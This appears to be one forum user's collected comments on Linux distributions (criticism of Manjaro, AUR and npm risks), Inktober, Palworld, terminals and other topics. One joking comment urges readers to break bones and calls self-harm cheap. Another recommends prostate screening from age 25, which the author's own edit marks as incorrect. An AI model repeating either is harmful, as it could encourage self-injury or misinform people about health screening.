The issue with that is potentially keeping software which has security bugs on your system for longer than needed. Also, if you install new software you’ll have a partial upgrade which can degrade your system. If you don’t install anything though, your system should work as it currently does without issue. Unless a particular app takes something from the internet which may need the upgraded software (say, discord, spotify, etc. as they’re electron based.)

If that’s what you want to do I would suggest switching to xubuntu, mint xfce edition, DSL, etc. as they’ll still patch security updates in. You do you though of course as with your stated usecase I can’t see any functional issue. I don’t see the reason for arch though.

Sure, but that wasn’t malicious code hacking your device just a simple phishing scheme. The aur runs arbitrary code each time which can do quite alot more on your system than any snap. That snap was just a fake app that sent your login to their server.

The aur is much more dangerous. Of course, when installing anything from anywhere be careful, but with the aur you need to be able to read the pkgbuild.

Thank you though for cautioning the snap store as you’re right. Those apps aren’t confirmed before they’re placed on the store

I wouldn’t suggest Manjaro. On a theoretical basis the distro is a good one but in practice, and with the current management of the distro, It’s one of few I’d say is a bad choice. They’re destructive to the general linux ecosystem, often make incredibly wild and unnecessary errors stemming from the highest level, do not properly maintain their promise of delaying packages until they’re fixed, and give bad info which can harm a user. Their devs also help propagate the “toxic linux” stereotype by being just that.

I’m gonna list off a few but manjarno has some more, with context. This will be written by memory too.

Please, skip to the header that’s most important to you.

Harming the ecosystem

The first thing you’ll likely hear is that they’ve DDOS’d the AUR twice, the exact same way through their Pamac GUI. Now, to be clear, this was not on purpose. They made a mistake. However, like quite a few other issues, they made this mistake twice showing they did nothing to stop it from happening twice. Something else which will become clear is that they don’t do these things due to malice (usually) but shear incompetence.

Next, their lead arm dev, the guy in charge of arm development, changed a version on a library on asahi linux (an arm fork) known to break X11 in a change which had nothing to do with that library. This shows he did not try running his code beforehand. The only reason it wasn’t checked by the larger project is due to the trust given to this, supposedly, high end dev. This after the company made a large campaign claiming that “Manjaro runs on the m1 macbook!” months before asahi was ready shipping some random build, not the latest or a set release, which only showed a black screen. To be clear, this could have broken people who tried to run it’s hardware. This is in no way a forced error.

Delayed package promise broke

This will be a short header, but it’s important. The promise of Manjaro is that they delay their packages two weeks. This, to ensure that any issues which arise can be caught and Manjaro can skip the bad version. However, this is not always the case. Quite often there’s an issue in a library or package where they wait the allotted time and still ship. These are CVE’s mostly and quite often have a fix out which manjaro won’t ship until the two weeks are up.

Delaying packages is another problem in and of itself too if you’re using the aur. What is the aur? Well, if you don’t know you shouldn’t be using it for one. The next header will discuss this issue

The AUR

The aur, the Arch User Repository, is a collection of scripts which install an application in many different ways. To be clear, this script can do anything on your PC as it’s just arbitrary code. This is user submitted, meaning essentially anyone can upload a script to the aur including a person names anus kiss. This is a danger in many cases as we’ve seen before. For a fun example, anuskuss uploaded an update to the most popular wii emulators aur package which included two calls to an IP tracking website and a list of people who can “go fuck themselves” including homophobic comments and, if I remember, incel rage. The aur will also be where any malaware on linux is most likely to come from and to be distributed there first.

Luckily though, if you know how to read these scripts, it’s mostly fine. However, manjaro places the button to enable it right next to enabling snaps and flatpaks. Both of which are perfectly safe to install if not safer than average packages. You need to be able to read the AUR package scripts to be safe.

Secondly, the AUR packages assume ARCH Linux. This means, when you install an aur app, it’s assuming dependancies which may be up to two weeks out of date. Either that, or it’ll install packages up to two weeks early. Now, if the first happens the AUR package risks breaking. Which is mostly fine. The latter though means system packages can fail. This is not good.

Sure, many people never have a problem with it, but that’s not an excuse. This should be much more clear.

Bad info

Please don’t use sudo pacman -Syyu to install packages. This will put a heavy load on the arch repositories for no benefit. Please, don’t randomly install aur packages. The AUR break your system? Yeah, according to them you fucked up and it’s all your fault. I’ll admit this is all I can remember here.

Random points

Ever find a site and when you try and go to it firefox says a secure connection cannot be established? That’s an expired or non existant SSL cert. They’ve let their SSL certificates run out 5 times. This is something you can update in less than 5 minutes, and can set up to update automatically in less than 10. It should not happen twice let alone 5 times. The first time they gave users a command to run in a terminal which set their time back in order to trick the system into thinking the cert was good.

Imma stop at this point. Way too long man, and it’s way too early for me. I should probably save this somewhere to copy paste when someone suggests the distro

Absolutely. Here’s three options

Fedora updates every, or around every, 3 months. This is very stable but very up to date.Most professional devs particularly ones working in Linux projects use it fornit’s relative stability while having modern packages.

There’s also PopOS! which is a rolling release, updating daily, but much more delayed than arch thus being much more usable.

Now for my favourite, OpenSuse Tumbleweed. Same style as PopOs but with a KDE, or gnome spin or of the box. A bit more sleek too. It also has YAST which is the best GUI based managment system on Linux.

I use arch (btw) but have a second duel booted tumbleweed install for work related stuff in order tonensure stability

Absolutely not thankfully. I’m in a similar position here personally which is why I love inktober. No matter your skill level, you’re always welcome.
To be clear that’s the case for the entire event not just this community. It’s quite a nice event

As am I, there’s some amazing creativity on lemmy.

As for the prompts looks like they’re up now on this site: https://inktober.com/rules

I just love cinnamon orange, but I at one point had some beautiful hot pepper tea too which I wish I could find again

deleted by creator

Huh, I’m always happy to proven wrong. thank you for bringing this up.

Is this still relevant however with blood testing becoming more prevelant? The main reasons listed are due to harms caused by probing both physical and psychological along with false positives which out-weigh the positives of a 0.128% life saving outcome. It’s been 6, nearly 7 years now and prostate testing is both more accurate and non-invasive

Either way, this body is currently in the final research plan stage of updating the recommendation.
https://www.uspreventiveservicestaskforce.org/uspstf/draft-update-summary/prostate-cancer-screening-adults
I’d agree we should stand by the current assessment though until it changes. Thank you for the correction

This is the perfect opportunity to recreationally infect yourself with rare short term diseases. Try breaking your arm or nose so you have a story. Self harm has never been so cheap.

Edit: See evasive_chimpanzee’s comment here, as the following seems to be incorrect information

Seriously though get checked for prostate cancer. Especially if you’re over 25 it’s very possible and catching it early will be a massive difference.

Same for everyone reading this. I doubt it’s that expensive so please look into it and get checked if affordable where you are.

Cock rings and vibrators are my dark horse bet

Normally I’d say fuck Nintendo but palworld obviously stole the designs and artistic direction for many of their characters.

Most of the pals I saw at first were modified versions of an already existant pokemon with little to seperate it from fan art of that pokemon. This is particularly agregoous as they clashed against the rest of this games aesthetic. Nothing that was original fit with the design of the pokemon rip offs.

Many other games have a pokemon esque aesthetic without direct copying. It looking similar is not my issue. My issue is that while playing I could easily name most pals to a pokemon. Seriously, look up comparisons. It’s blatant.

They’ve moved away from thisbrecently but fuck man if it ain’t obvious. If they did the same to some small project I’d assume people would be much more up in arms, rightfully so.

Still though, I won’t cry if Nintendo loses. I hope they pay an insane amount in lawyers fees either way and never see a dime out of the case

Yeah don’t worry about it too much. Ensure you have the correct name when installing your library but that’s about all you can do personally.

Any other solution will have some security flaws. NPM has a few more than it should but essentially the entire web is built around it. Sorry man, you don’t have any other choices.

How to use it properly? Any npm tutorial will show you quickly. Always check you’ve got the right thing, always check the library is large enough that if something goes wrong it’ll be noticed, and know there’s no way to be completely safe without never using libraries.

If you’re learning the web though there’s no way to avoid npm.

My father has the ability to make shirts with his cricut, and seperatly a sublimation printer.

What I’m saying is that I’ll soon be the first, and only, owner of a pirated Lemmy t-shirt.

Nah I’ll admit it, I was entirely wrong in thinking Biden should stay in the race. Though I could say I was worried another person than kamala would take their place I had essentially no faith in her ability at the time either.

Now look at where we are. Finally, some good fucking hopium. I’m very glad to be wrong

Edit: these suggestions are last resort type stuff tbf, hope the guys in the other thread are more help. Looks like someone suggested session restore w/ kde which makes alot of sense.

Ok that’s increadibly weird. Here’s some places I’d look.

I’d start looking in environment files such as ~/.bash_profile, .~/.profile, /etc/environment, /etc/profile and a few others. Maybe there’s a call to the application in one of these files?

Secondly, I’d attempt to write a bash script to walk a directory tree, cat out files, pipe it through grep and get every instance where VirtualBox is mentioned in a file. Trying the name of proccess, or of the executable too.

I have a snippet that may help, by replacing that bash script:
grep -Rinw '~/path/to/start/' -e 'VirtualBoxOrSmthngElse'

all credit to this answer on SO:
https://stackoverflow.com/a/16957078/11534230

Head there to see how to try and wittle down the matches. I’d start in a etc, ignore binary files with grep, and try everywere systematically

This is likely overkill lol. If you’re on xorg maybe there’s something in the file xorg uses for init? Can’t remember the name personally but I used it to start up some processes before on system boot quite a while ago

Oh shit I see. I think the joke is that you only get some of the security updates if you pay for ubuntu pro. Ransom as in “Be a shame if you were insecure there little buddy, we can help with that. For a price”

Yeah I don’t know enough about that personally to make a judgment

You do make some good points on it being terminalside, you’ve partially changed my mind there. I see the value now.

Also, you would be correct anything that allowed collapsing commands would be trivial to implement some sort of action per command and it’s output. Along with collapsing being easiest to do terminalside.

What I would love to see is a terminal that builds it’s own shell from scratch too rejecting the ancient ideas we have with bash. I still love bash but I’m curious what could come of it.

As for their luddite status their reply to my previous comment seems to show them to be a bit more open

Seriously though thanks for the good conversation and thought excersize

Konsole can display images, as can kitty, alacritty, western, iterm2, etc. There’s quite a few formats to do so dating back decades. This isn’t new.

As for collapsing a command and it’s output that’s nice, but it’s not exactly game changing.

Lastly, searching explicitly your last command for a term with context would be much better suited to the shell to solve as it’d be terminal independent. Wouldn’t surprise me if under the hood it’s a bash script that takes whatever input you pass to bash, execs it, pipes stdout to tee, which passes it to a text file storing output and the console’s output too. Of course, you can always pipe it to fzf for a live grep with context if you have it set up right and remember to do so

I would agree just denying any advancements in favor of the “good ole way” is idiotic but nothing I’ve seen or that you’ve listed convinces me these are major advancements. Nor are these anything that couldn’t be solved at the shells level or with supplementary applications. Nice to have, if it weren’t electron or closed I would switch, but nothing groundbreaking

I doubt they’re outright rejecting any idea of progress. They’re likely just not convinced by what the fancy options offer

Hell yeah, now that it finally works with Wayland on nvidia with explicit sync being added to the 555 drivers it’s been great for me